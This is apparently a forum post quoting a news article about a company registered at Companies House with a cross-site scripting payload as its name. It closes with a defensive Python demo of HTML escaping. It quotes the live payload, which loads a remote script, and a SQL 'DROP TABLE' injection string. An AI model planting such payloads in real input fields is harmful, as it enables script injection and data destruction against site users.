He now says he didn't realise that Companies House was actually vulnerable to the extremely simple technique he used, known as "cross-site scripting", which allows an attacker to run code from one website on another.
The original name of the company was ""><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD". By beginning the name with a quotation mark and chevron, any site which failed to properly handle the HTML code would have mistakenly thought the company name was blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors.
Similar names have been registered in the past, such as "; DROP TABLE "COMPANIES";-- LTD", a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response. Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply "Company name available on request". [...]
He did not realise it would be an issue, he said, because characters including > and " are explicitly allowed as company names, which suggested that the agency had put security measures in place to prevent such attacks.
A Companies House spokesperson [lied]: "A company was registered using characters that could have presented a security risk to a small number of our customers, if published on unprotected external websites."
I love that they called it a "chevron".
Chevron 1 was, apparently, not encoded.
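What "not encoded" means in practice, as an added example that is not part of the original post or the quoted article: the company name from the article is placed in an HTML attribute with and without output encoding, and the result is parsed to see which elements a browser-like parser would find. The form field and the names `render_unsafe`, `render_escaped` and `audit` are hypothetical, standing in for any downstream site that displays the register's data.

```python
from html import escape
from html.parser import HTMLParser

# Company name exactly as quoted in the article above.
COMPANY_NAME = '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD'


def render_unsafe(name):
    # Hypothetical downstream page that pastes the name into an attribute as-is.
    return '<input name="company" value="' + name + '">'


def render_escaped(name):
    # quote=True also encodes " and ', which is what matters inside an attribute.
    return '<input name="company" value="' + escape(name, quote=True) + '">'


class TagAudit(HTMLParser):
    """Records every start tag and the value attribute of the first <input>."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input" and self.input_value is None:
            self.input_value = dict(attrs).get("value")


def audit(markup):
    """Return (list of element names found, value of the input field)."""
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_value


if __name__ == "__main__":
    for render in (render_unsafe, render_escaped):
        markup = render(COMPANY_NAME)
        tags, value = audit(markup)
        print(render.__name__, "->", markup)
        print("  elements:", tags, "| field value:", repr(value))
```

In the unencoded output the field value is empty and a `script` element appears, matching the article's description; in the encoded output the only element is the `input`, and its value is the full company name.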